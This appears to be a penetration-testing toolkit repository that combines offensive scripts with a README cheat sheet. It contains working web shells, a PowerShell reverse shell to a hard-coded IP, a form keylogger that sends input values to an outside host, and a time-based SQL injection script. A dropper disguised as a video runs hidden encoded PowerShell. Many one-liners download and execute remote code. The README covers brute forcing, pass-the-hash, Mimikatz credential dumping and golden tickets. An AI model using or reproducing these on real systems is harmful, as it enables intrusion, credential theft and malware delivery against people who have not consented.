├── fdns.sh ├── setuid.c ├── downloadproxy.ps1 ├── minimum_csharp_shell.cs ├── archive.sh ├── lfi_infile.py ├── jsp_processbuilder_shell.java ├── keylogger.js ├── jspb64_shell.java ├── timebased_sqli.py ├── pocxsl.xsl ├── runas-cabesha-webdelivery.ps1 ├── detalle.SettingContent-ms ├── reverse.ps1 ├── powershell_to_meterpreter.sh ├── wget.vbs ├── fakevideo.cs ├── README.md ├── lfiunix.txt ├── linenumv2.sh └── nops.xsl /fdns.sh: -------------------------------------------------------------------------------- 1 | curl -s 'https://scans.io/_d/data/rapid7/sonar.fdns_v2/2018-02-04-1517731201-fdns_any.json.gz' | pigz -dc \ 2 | | grep -P "\.$1" \ 3 | | jq -r '.name' \ 4 | | tee fdnsx-$1.txt 5 | -------------------------------------------------------------------------------- /setuid.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | int main() 6 | { 7 | setuid(0); 8 | setgid(0); 9 | system( "/bin/sh -i" ); 10 | } 11 | -------------------------------------------------------------------------------- /downloadproxy.ps1: -------------------------------------------------------------------------------- 1 | $browser=New-Object System.Net.WebClient; $browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX($browser.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1"));Invoke-ShareFinder 2 | -------------------------------------------------------------------------------- /minimum_csharp_shell.cs: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import Namespace="System.Diagnostics" %> 3 | <%= 4 | Process.Start( 5 | new ProcessStartInfo("cmd" ,"/c " + Request["c"] ) 6 | { 7 | UseShellExecute = false, 8 | RedirectStandardOutput = true 9 | } 10 | ).StandardOutput.ReadToEnd() 11 | %> 12 | -------------------------------------------------------------------------------- /archive.sh: -------------------------------------------------------------------------------- 1 | archive() { 2 | 3 | curl -s 'http://web.archive.org/cdx/search?url='$1'%2F&matchType=prefix&collapse=urlkey&output=json&fl=original%2Cmimetype%2Ctimestamp%2Cendtimestamp%2Cgroupcount%2Cuniqcount&filter=!statuscode%3A%5B45%5D..&limit=100000&_=1532513891577' --compressed | grep -Po "(?<=\[\").*?(?=\")" 4 | 5 | } 6 | -------------------------------------------------------------------------------- /lfi_infile.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import base64 4 | 5 | 6 | while True: 7 | 8 | file = raw_input('$ ') 9 | resp = requests.get("http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=" + file) 10 | print resp.text 11 | m = re.search('(?<=\[$).*?(?=$\])', resp.text) 12 | try: 13 | print base64.b64decode(m.group(0)) 14 | except: 15 | 'file does not exist or no permissions' 16 | -------------------------------------------------------------------------------- /jsp_processbuilder_shell.java: -------------------------------------------------------------------------------- 1 |

 2 | <%@ page import="java.util.*,java.io.*,java.lang.*"%>
 3 | <%
 4 | String cmd = request.getParameter("cmd");
 5 | Process a =( new java.lang.ProcessBuilder(cmd.toString().split("\\s"))).start();
 6 | InputStream in = a.getInputStream();
 7 | DataInputStream dis = new DataInputStream(in);
 8 | String disr = dis.readLine();
 9 | while ( disr != null ) {
10 | out.println(disr);
11 | disr = dis.readLine();
12 | }
13 | %>
14 |

15 | -------------------------------------------------------------------------------- /keylogger.js: -------------------------------------------------------------------------------- 1 | var input = document.querySelectorAll("input"); 2 | 3 | function saveLocal(e) { 4 | var url = "http://192.168.30.178:8000/"; 5 | var method = "GET"; //Metodo HTTP 6 | var request = new XMLHttpRequest(); 7 | request.open(method, url + this.name + ":" + this.value, false); 8 | request.send(); 9 | } 10 | 11 | for (var i = 0; i < input.length; i++) { 12 | 13 | input[i].addEventListener("blur", saveLocal); 14 | 15 | } 16 | -------------------------------------------------------------------------------- /jspb64_shell.java: -------------------------------------------------------------------------------- 1 |

 2 | <%@ page import="java.util.*,java.io.*,java.lang.*"%>
 3 | <%
 4 | sun.misc.BASE64Decoder dec64 = new sun.misc.BASE64Decoder();
 5 | byte[] bc = dec64.decodeBuffer(request.getParameter("cmd"));
 6 | String sc = new String(bc, "UTF-8");
 7 | Process a =( new java.lang.ProcessBuilder(sc.toString().split("\\s"))).start();
 8 | InputStream in = a.getInputStream();
 9 | DataInputStream dis = new DataInputStream(in);
10 | String disr = dis.readLine();
11 | while ( disr != null ) {
12 | out.println(disr);
13 | disr = dis.readLine();
14 | }
15 | %>
16 |

17 | -------------------------------------------------------------------------------- /timebased_sqli.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | chars = "abcdefghijklmnopqrstuvwxyz123456789*!$#/|&" 5 | 6 | for n in range(10): 7 | 8 | for i in range(1,21): 9 | 10 | for char in chars: 11 | r = requests.get("https://domain/ajs.php?buc=439'and+(select+sleep(10)+from+dual+where+\ 12 | substring((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()\ 13 | +limit+"+str(n)+",1),"+str(i)+",1)+like+'"+char+"')--+-") 14 | 15 | 16 | secs = r.elapsed.total_seconds() 17 | 18 | if secs > 10: 19 | print char, 20 | 21 | print "\n" 22 | -------------------------------------------------------------------------------- /pocxsl.xsl: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 11 | 12 | -------------------------------------------------------------------------------- /runas-cabesha-webdelivery.ps1: -------------------------------------------------------------------------------- 1 | function runas-cabesha-webdelivery {param ($url,$user,$pass) 2 | $username = $user 3 | $password = $pass 4 | $securePassword = ConvertTo-SecureString $password -AsPlainText -Force 5 | $credenciales = New-Object System.Management.Automation.PSCredential $username, $securePassword 6 | Start-Job -ArgumentList $url,$credenciales -ScriptBlock {param ($url,$credenciales) 7 | $O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($O.downloadstring("$URL")) 8 | } -Credential $credenciales | Wait-Job | Receive-Job 9 | } 10 | 11 | // ACK to @cybervaka, the powershell God 12 | -------------------------------------------------------------------------------- /detalle.SettingContent-ms: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel 6 | %windir%\system32\mshta.exe http://192.168.1.43/LICENSE.txt 7 | %windir%\system32\control.exe 8 | 9 | 10 | 11 | {12B1697E-D3A0-4DBC-B568-CCF64A3F934D} 12 | 13 | 14 | @shell32.dll,-4161 15 | @shell32.dll,-4161 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /reverse.ps1: -------------------------------------------------------------------------------- 1 | $client = New-Object System.Net.Sockets.TCPClient("47.88.59.85",4444); 2 | $stream = $client.GetStream(); 3 | 4 | $greeting = "PS " + (pwd).Path + "> "; 5 | $sendbyte = ([text.encoding]::ASCII).GetBytes($greeting); 6 | $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush(); 7 | [byte[]]$bytes = 0..255|%{0}; 8 | 9 | 10 | while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { 11 | $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); 12 | $sendback = (iex $data 2>&1 | Out-String ); 13 | $sendback2 = $sendback + "PS " + (pwd).Path + "> "; 14 | $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); 15 | $stream.Write($sendbyte,0,$sendbyte.Length); 16 | $stream.Flush() }; 17 | $client.Close(); 18 | //cat reverse.ps1 | iconv -f UTF8 -t UTF16LE | base64 -w0 19 | //powershell -Enc payload 20 | -------------------------------------------------------------------------------- /powershell_to_meterpreter.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # meterpreter ip & port 4 | lhost=10.10.14.xx 5 | lport=443 6 | 7 | echo " * Writing Payload" 8 | cat /usr/share/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload 9 | echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload 10 | 11 | echo " * Prepping Command" 12 | scriptblock="iex (New-Object Net.WebClient).DownloadString('http://$lhost:8000/payload')" 13 | echo $scriptblock 14 | 15 | echo 16 | echo " * Encoding command" 17 | encode="`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`" 18 | echo $encode 19 | 20 | command="cmd.exe /c powershell.exe -Exec ByPass -Nol -Enc $encode" 21 | echo 22 | echo " * Final command" 23 | echo $command 24 | 25 | echo 26 | echo " * Starting HTTP Server to serve payload" 27 | python -m SimpleHTTPServer 28 | -------------------------------------------------------------------------------- /wget.vbs: -------------------------------------------------------------------------------- 1 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 2 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 3 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 4 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 5 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 6 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 7 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 8 | echo Err.Clear >> wget.vbs 9 | echo Set http = Nothing >> wget.vbs 10 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 11 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 12 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 13 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 14 | echo http.Open "GET", strURL, False >> wget.vbs 15 | echo http.Send >> wget.vbs 16 | echo varByteArray = http.ResponseBody >> wget.vbs 17 | echo Set http = Nothing >> wget.vbs 18 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 19 | echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 20 | echo strData = "" >> wget.vbs 21 | echo strBuffer = "" >> wget.vbs 22 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 23 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 24 | echo Next >> wget.vbs 25 | echo ts.Close >> wget.vbs 26 | -------------------------------------------------------------------------------- /fakevideo.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Diagnostics; 4 | 5 | namespace ConsoleApplication7 6 | { 7 | class Program 8 | { 9 | static void Main() 10 | { 11 | // Copiar el vídeo a un archivo temporal y abrirlo 12 | byte[] archivo = Properties.Resources.videoplayback1; 13 | string destino = Environment.ExpandEnvironmentVariables(@"%tmp%\video.mp4"); 14 | File.WriteAllBytes(destino, archivo); 15 | Process procesoArchivo = Process.Start(destino); 16 | 17 | // Ejecutar launcher 18 | ProcessStartInfo launcherProcess = new ProcessStartInfo(); 19 | // C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 20 | launcherProcess.FileName = Environment.ExpandEnvironmentVariables(@"%windir%\System32\WindowsPowerShell\v1.0\powershell.exe"); 21 | launcherProcess.Arguments = "powershell -noP -sta -w 1 -enc "; 22 | launcherProcess.WindowStyle = ProcessWindowStyle.Hidden; 23 | Process.Start(launcherProcess); 24 | 25 | // Esperar a que cierren el vídeo/imagen/pdf, lo que sea 26 | procesoArchivo.WaitForExit(); 27 | // Eliminar nuestro vídeo 28 | while (File.Exists(destino)) 29 | { 30 | try 31 | { 32 | File.Delete(destino); 33 | } 34 | catch { } 35 | } 36 | } 37 | } 38 | } 39 | 40 | // Credits to @3xploit 41 | 42 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Table of Contents 2 | 3 | - [Enumeration](#enumeration) 4 | * [Generic Enumeration](#genumeration) 5 | * [HTTP Enumeration](#httpenumeration) 6 | * [SSH Enumeration](#sshenumeration) 7 | * [SMB Enumeraion](#smbenumeration) 8 | * [SNMP Enumeration](#snmpenumeration) 9 | - [Explotation](#explotation) 10 | * [BOF Based Exploits](#bof) 11 | * [Weak Credentials](#weakcreds) 12 | * [HTTP Bruteforce](#httpbrute) 13 | * [Password Cracking](#passcrack) 14 | * [RCE](#rce) 15 | * [PHP RCE](#phprce) 16 | * [RCE via webshell](#rcewebshell) 17 | * [RCE WMIC (powershellless)](#rcewmic) 18 | * [LOLBins](#lolbins) 19 | - [Privilege Escalation](#privesc) 20 | * [Linux](#linux) 21 | * [Windows](#windows) 22 | * [Kernel Exploits](#kernel) 23 | - [Tunneling & Port Forwarding](#tunneling) 24 | * [SSH over TCP](#sshovertcp) 25 | * [TCP over HTTP](#tcpoverhttp) 26 | * [1. reGeorg](#regeorg) 27 | * [2. ABPTTS](#abptts) 28 | * [HTTP Redirectors](#httpredirectors) 29 | * [1. socat](#socatred) 30 | * [2. iptables](#iptablesred) 31 | * [Man's poor VPN](#poor) 32 | - [Windows Active Directory](#windowsad) 33 | * [Bypass Applocker](#applocker) 34 | * [Pass The Hash](#pth) 35 | * [Kerberos](#krb) 36 | * [Miscellaneous](#miscwin) 37 | - [Reverse Shells](#revshells) 38 | * [DNS with dnscat2](#dns) 39 | * [ICMP](#icmp) 40 | * [HTTP through proxy](#httpproxy) 41 | - [Miscellaneous](#misc) 42 | * [Interactive Reverse Shell](#interactiveshell) 43 | * [Windows File Transfer](#windowstransfer) 44 | * [Bypass VPN routing restrictions](#vpnrestrict) 45 | 46 | 47 | 48 | 49 | --- 50 | 51 | 52 | 53 |

Enumeration

54 | 55 |

Generic Enumeration

56 | 57 | - port fullscan 58 | 59 | - UDP scan 60 | 61 | 62 |

HTTP Enumeration

63 | 64 | - dirsearch big.txt -e sh,txt,htm,php,cgi,html,pl,bak,old 65 | 66 | - banner inspection 67 | 68 | - review source code 69 | 70 | - bruteforce with cewl-based dictionary 71 | 72 | - searchsploit look at versions properly 73 | 74 | - test all the paths with the exploits, mangle it 75 | 76 | - nmap --script vuln 77 | 78 | - nmap --script safe (ssl-cert, virtual hosts) 79 | 80 | - always incercept with Burp 81 | 82 | - nikto -h 83 | 84 | - LFI, RFI, SQL, RCE, XXE, SSRF injections 85 | 86 | - PUT method all directories 87 | 88 | - Change POST body encoding with Burp 89 | 90 | - Bruteforce parameter names 91 | 92 | - dirsearch with cookie once authenticated 93 | 94 | - download vulnerable application from exploit-db and examine it 95 | 96 |

SSH Enumeration

97 | 98 | - shellshock 99 | 100 | - bruteforce 101 | 102 | - user_enum 103 | 104 | - Debian OpenSSL Predictable PRNG 105 | 106 |

SMB Enumeration

107 | 108 | - nmap --script vuln 109 | 110 | - nmap --script smb* 111 | 112 | - nmap --script smb-enum-shares,smb-ls 113 | 114 | - enum4linux 115 | 116 |

SNMP Enumeration

117 | 118 | - snmpcheck 119 | 120 | - snmpenum 121 | 122 |

Explotation

123 | 124 |

BOF exploit-based

125 | 126 | - change shellcode 127 | 128 | - make sure all badchars are removed 129 | 130 | - read the exploit properly in case this makes changes in the shellcode 131 | 132 | - capture traffic with wireshark making sure the entire shellcode is transmited 133 | 134 | - run the exploit several times 135 | 136 | - make sure the JMP ESP matches OS and language 137 | 138 | 139 |

Weak Credentials

140 | 141 | 142 | HTTP Brute Force 143 | 144 | - wfuzz POST 145 | 146 | ```wfuzz --hc 404 -c -z list,admin -z file,/root/Documents/SecLists/Passwords/korelogic-password.txt -d "user=FUZZ&password=FUZ2Z" http://192.168.30.161/admin/index.php``` 147 | 148 | - hydra POST 149 | 150 | ```hydra 192.168.30.161 -s 80 http-form-post "/admin/index.php:user=^USER^&password=^PASS^:Moved Temporarily" -l admin -P /root/Documents/SecLists/Passwords/korelogic-password.txt -t 20``` 151 | 152 | - wfuzz NTLM 153 | 154 | ```wfuzz -c --ntlm "admin:FUZZ" -z file,/root/Documents/SecLists/Passwords/darkc0de.txt --hc 401 https:///api``` 155 | 156 | - wfuzz Basic Auth through Proxy 157 | 158 | ```wfuzz -c --hc 404,400,401 -z file,/root/Documents/Audits/ActivosProduban/names.txt -z file,/root/Documents/Audits/ActivosProduban/names.txt --basic "FUZZ:FUZ2Z" -p 127.0.0.1:8080 https:///api/v1/``` 159 | 160 | 161 | Password Cracking 162 | 163 | - zip 164 | 165 | `fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip ` 166 | 167 | - /etc/shadow 168 | 169 |

170 | unshadow passwd shadow > passwords
171 | john --wordlist=/usr/share/wordlists/rockyou.txt passwords
172 |

173 | 174 | - keepass 175 | 176 |

177 | keepass2john /root/Desktop/NewDatabase.kdb > file
178 | john -incremental:alpha -format=keepass file
179 |

180 | 181 | 182 |

RCE

183 | 184 |

PHP RCE

185 | 186 | test: 187 | 188 | `````` 189 | 190 | simple shell: 191 | 192 | `````` 193 | 194 | `````` 195 | 196 | file upload: 197 | 198 | ```'); ?>``` 199 | 200 | file upload evasion: rot13 + urlencode 201 | 202 | `````` 203 | 204 | 205 |

RCE via webshell

206 | 207 | - All pentest monkey reverse shells: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 208 | 209 | - msfvenom x86/linux/shell_reverse_tcp -f elf 210 | 211 | - Metasploit `web_delivery` module 212 | 213 | - which wget | nc 214 | 215 |

RCE via WMIC

216 | 217 | Powershell without powershell: 218 | 219 | Generate payload with web_delivery 220 | 221 | ![powershellless1](https://user-images.githubusercontent.com/7115563/40374533-8da00e10-5de9-11e8-888e-3b1eaccb28b0.png) 222 | 223 | Encode Payload 224 | 225 | ![powershellless2](https://user-images.githubusercontent.com/7115563/40374540-908e0ca8-5de9-11e8-9002-5f03193b10a5.png) 226 | 227 | Include payload in xsl file 228 | 229 | ![powershellless3](https://user-images.githubusercontent.com/7115563/40374546-92dcda84-5de9-11e8-99c8-9066ae129644.png) 230 | 231 |

wmic process get brief /format:"https://raw.githubusercontent.com/adon90/pentest_compilation/master/nops.xsl"

232 | 233 | ![powershellless4](https://user-images.githubusercontent.com/7115563/40375266-73770028-5deb-11e8-92da-952692727bec.png) 234 | 235 |

LOLBINS

236 | 237 | SyncAppvPublishingServer 238 | 239 |

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://192.168.48.129:8000/reverse.ps1') | IEX"

240 | 241 | ![lolbin1](https://user-images.githubusercontent.com/7115563/40776727-ee904d00-64cb-11e8-8921-407581b13edf.png) 242 | 243 | rundll32 244 | 245 |

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("regsvr32 /s /n /u /i:http://192.168.48.130:8080/bhRxgASz0.sct scrobj.dll")

246 | 247 | 248 |

Privilege Escalation

249 | 250 | 251 |

Linux Privilege Escalation

Windows Privilege Escalation

Kernel Exploits

288 | 289 | Linux: https://github.com/lucyoa/kernel-exploits 290 | 291 | Windows: https://github.com/abatchy17/WindowsExploits 292 | 293 | 294 | 295 |

Tunneling & Port Forwarding

296 | 297 |

SSH over HTTP (Squid)

298 | 299 | socat 300 | 301 |

socat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.41:127.0.0.1:22,proxyport=3128
302 | 
303 | ssh john@127.0.0.1 -p 9999

304 | 305 | 306 | proxytunnel 307 | 308 |

proxytunnel -p 192.168.1.41:3128 -d 127.0.0.1:22 -a 5555
309 | 
310 | ssh john@127.0.0.1 -p 5555

311 | 312 | proxychains 313 | 314 |

http 192.168.1.41 3128
315 | 
316 | proxychains ssh john@127.0.0.1

317 | 318 | ![proxychains](https://user-images.githubusercontent.com/7115563/33822522-1e15dbee-de58-11e7-9953-3da8ff684cfc.png) 319 | 320 | 321 | corkscrew 322 | 323 |

ssh john@192.168.1.41 -t /bin/sh

324 | 325 | ![cork](https://user-images.githubusercontent.com/7115563/33822672-b92a51f0-de58-11e7-9936-06056b7903b8.png) 326 | 327 | 328 |

TCP over HTTP

329 | 330 | For this technique, it is necessary to be able to upload a file to a webserver. 331 | 332 | 1. reGeorg 333 | 334 | File upload to the server correct 335 | 336 | ![regeorge2](https://user-images.githubusercontent.com/7115563/33883424-028c9f0e-df3c-11e7-9559-b35667ae76db.png) 337 | 338 | Tunnel creation 339 | 340 | `python reGeorgSocksProxy.py -p 5555 -u "http:///admin/uploads/reGeorg.jsp"` 341 | 342 | Proxychains config 343 | 344 | ![regeorge1](https://user-images.githubusercontent.com/7115563/33883419-fcc15416-df3b-11e7-89a9-499ffc1de9cf.png) 345 | 346 |

347 | proxychains nmap -F -sT 127.0.0.1
348 | proxychains mysql -u root -p -h 127.0.0.1
349 | proxychains ssh localhost
350 |

351 | 352 | ![regeorge3](https://user-images.githubusercontent.com/7115563/33883422-017021fe-df3c-11e7-8f99-f02de5084c02.png) 353 | 354 | Reference: https://sensepost.com/discover/tools/reGeorg/ 355 | 356 | 2. ABBTTS 357 | 358 | Upload File 359 | 360 | ![abbtts5](https://user-images.githubusercontent.com/7115563/33883774-6d249ffa-df3d-11e7-9f3f-68bf1e70465f.png) 361 | 362 | Config proxychains and create the tunnel 363 | 364 | ```python abpttsclient.py -c tomcat_walkthrough/config.txt -u http://192.168.1.128/abptts.jsp -f 127.0.0.1:22222/127.0.0.1:22``` 365 | 366 | Usage 367 | 368 | ```ssh -p 22222 user@127.0.0.1``` 369 | 370 | ![abbtts7](https://user-images.githubusercontent.com/7115563/33883891-dc2f3c70-df3d-11e7-84e9-ebd9eab9ebee.png) 371 | 372 | Reference: https://github.com/nccgroup/ABPTTS 373 | 374 | 375 |

HTTP Redirectors

376 | 377 | 1. socat 378 | 379 |

socat TCP4-LISTEN:80,fork TCP4:REMOTE-HOST-IP-ADDRESS:80

380 | 381 | 382 | ![socatt](https://user-images.githubusercontent.com/7115563/42031184-a8b3deee-7ad5-11e8-96ae-9b38bfe82df2.png) 383 | 384 | 2. iptables 385 | 386 |

iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
387 | iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination REMOTEADDR:80
388 | iptables -t nat -A POSTROUTING -j MASQUERADE
389 | iptables -I FORWARD -j ACCEPT
390 | iptables -P FORWARD ACCEPT
391 | sysctl net.ipv4.ip_forward=1

392 | 393 | ![iptables](https://user-images.githubusercontent.com/7115563/41294963-97cc925c-6e59-11e8-8adf-8db85f6ffaf2.png) 394 | 395 | 396 | 397 |

Man's Poor VPN

398 | 399 | Traffic forward over SSH without needing to ```ssh -D ``` 400 | 401 |

sshuttle -vr user@192.168.207.57 1X0.1X.0.0/16

402 | 403 | ![sshuttle](https://user-images.githubusercontent.com/7115563/42047219-02a13b70-7b00-11e8-9686-8bf2f44bee81.png) 404 | 405 | Proof: 406 | 407 | ![mantis2](https://user-images.githubusercontent.com/7115563/34785499-a0e7d838-f631-11e7-869f-d6fcdc1051e9.png) 408 | 409 | Reference: http://teohm.com/blog/using-sshuttle-in-daily-work/ 410 | 411 | 412 | 413 |

Windows AD Environment

414 | 415 |

Bypass Applocker

416 | 417 | 1. rundll32 418 | 419 | ```rundll32.exe PowerShdll.dll,main``` 420 | 421 | ![applocker](https://user-images.githubusercontent.com/7115563/34455568-dfe7d7c6-ed81-11e7-9869-de2d4e92f3aa.png) 422 | 423 | Reference: https://github.com/p3nt4/PowerShdll 424 | 425 | 2. Alternative powershell files 426 | 427 | ![applocker2](https://user-images.githubusercontent.com/7115563/34455569-e0136c6a-ed81-11e7-9b0e-127ae9d395e0.png) 428 | 429 | ```C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise``` 430 | 431 | 432 |

Pass The Hash

433 | 434 | 435 | Invoke a command Remotely 436 | 437 |

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1')
438 |  
439 |  Invoke-WMIExec -Target SVHOST2  -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell whoami | out-file \\SVHOST2\C$\windows\bitch.txt"
440 |

441 | 442 | Invoke Mimikatz Remotely 443 | 444 |

Invoke-WMIExec -Target SVHOST2  -Username Administrator
445 | -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell -Enc SQBFA...AoA"

446 | 447 | ![image](https://user-images.githubusercontent.com/7115563/34455757-1f6aed1c-ed86-11e7-9415-595fa5e8d6e7.png) 448 | 449 | Pass The Hash with Mimikatz 450 | 451 |

 Invoke-Mimikatz -Command '"sekurlsa::pth /user:adm_maint /ntlm:cbe55f143fcb6d4687583af520123b89 /domain:lazuli"'

452 | 453 | 454 |

Kerberos

455 | 456 | 457 | Generate Golden Ticket (Domain Admin Required) 458 | 459 |

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:LAZULI.CORP /user:krbtgt"'

460 | 461 | ![image](https://user-images.githubusercontent.com/7115563/34455725-7230ee30-ed85-11e7-9333-16372355ce60.png) 462 | 463 | ![image](https://user-images.githubusercontent.com/7115563/34455734-89934d5c-ed85-11e7-960e-9659e099c9df.png) 464 | 465 |

Invoke-Mimikatz  -Command '"kerberos::golden /user:adon /domain:LAZULI.CORP /krbtgt:ca1c2aeda9160094be9971bdc21c50aa /sid:S-1-5-21-1238634245-2147606590-2801756923 /id:500 /ticket:admin.kirbi /ptt"

466 | 467 | ![image](https://user-images.githubusercontent.com/7115563/34455745-9edd0360-ed85-11e7-84f0-6d62e621613b.png) 468 | 469 |

Invoke-Mimikatz  -Command '"kerberos::ptt admin.kirbi"'

470 | 471 | ![image](https://user-images.githubusercontent.com/7115563/34455747-b285372a-ed85-11e7-9374-c481108db77e.png) 472 | 473 | ![image](https://user-images.githubusercontent.com/7115563/34455748-bb0512c6-ed85-11e7-8d40-b6516cf8b0f3.png) 474 | 475 |

Miscellaneous

476 | 477 | Invoke Mimikatz 478 | 479 |

IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz

480 | 481 | Mimikatz C# 482 | 483 |

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /unsafe katz.cs

484 | 485 | https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7 486 | 487 | In case compiler is outdated: 488 | 489 |

nuget install Microsoft.Net.Compilers

490 | 491 | Runas Powershell 492 | 493 | ```Start-Process powershell.exe -Verb runas``` 494 | ```Start-Process powershell.exe -Credential ``` 495 | 496 | View Shares With Permissions 497 | 498 |

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-ShareFinder -CheckShareAccess"

499 | 500 | ![image](https://user-images.githubusercontent.com/7115563/34455620-34f292b4-ed83-11e7-92b0-3b8dd387146f.png) 501 | 502 | 503 | View files that contain certain words recursively 504 | 505 |

 ls -Path \\SVHOST1.LAZULI.CORP\tmp$ -Include "*pass*","*
506 | admin*","*secret*" -Recurse -ErrorAction SilentlyContinue

507 | 508 | ![image](https://user-images.githubusercontent.com/7115563/34455641-aa03adf4-ed83-11e7-8333-a69366714921.png) 509 | 510 | View files which name contains certain words recursively 511 | 512 |

dir -Path \\SVHOST1.LAZULI.CORP -Include "*pass*","*admin*","*secret*" -Recurse -ErrorAction SilentlyContinue

513 | 514 | ![image](https://user-images.githubusercontent.com/7115563/34455649-dcc941ea-ed83-11e7-9428-a702f254e807.png) 515 | 516 | Connect to MSSQL Database 517 | 518 |

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/michaellwest/PowerShell-Modules/master/CorpApps/Invoke-SqlCommand.ps1')
519 | 
520 | Invoke-SqlCommand -Server 172.11.14.89 -Database master -Username sa -Password  -Query "exec sp_databases"

521 | 522 | Port Scanning 523 | 524 |

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1')
525 | 
526 | Invoke-Portscan -Hosts [ip] -TopPorts 50

527 | 528 | ![image](https://user-images.githubusercontent.com/7115563/34455679-6e630230-ed84-11e7-995e-2eea1a6fc8dc.png) 529 | 530 | 531 | View Domain Admins 532 | 533 |

 net groups /domain "Domain Admins"

534 | 535 | ![image](https://user-images.githubusercontent.com/7115563/34455690-9e648d78-ed84-11e7-9a84-9b335530a31e.png) 536 | 537 | View Domain Controlers 538 | 539 |

nltest /dclist:

540 | 541 | ![image](https://user-images.githubusercontent.com/7115563/34455698-d1504074-ed84-11e7-85ad-c4bb196c9d44.png) 542 | 543 | 544 | 545 | Get Hashes 546 | 547 |

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

548 | 549 | ![image](https://user-images.githubusercontent.com/7115563/34455769-66cb31bc-ed86-11e7-846e-090647d8e32f.png) 550 | 551 | 552 | Check Pass The Hash with multiple servers 553 | 554 |

$hosts = @("SVDC1.LAZULI.CORP","SVFILES.LAZULI.CORP","SVHOST1.LAZULI.CORP","SVHOST2.LAZULI.CORP","SVFILES2.LAZULI.CORP")
555 | 
556 | foreach ($h in $hosts){ Invoke-WMIExec -Target $h -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "hostname" -Verbose }
557 | 
558 |

559 | 560 | ![image](https://user-images.githubusercontent.com/7115563/34455798-0bdc77ec-ed87-11e7-9504-6b9ec6fc2a8d.png) 561 | 562 | Run web_delivery with other identity 563 | 564 |

 runas-cabesha-webdelivery -url [url_webdelivery] -user [url] -pass [pass]

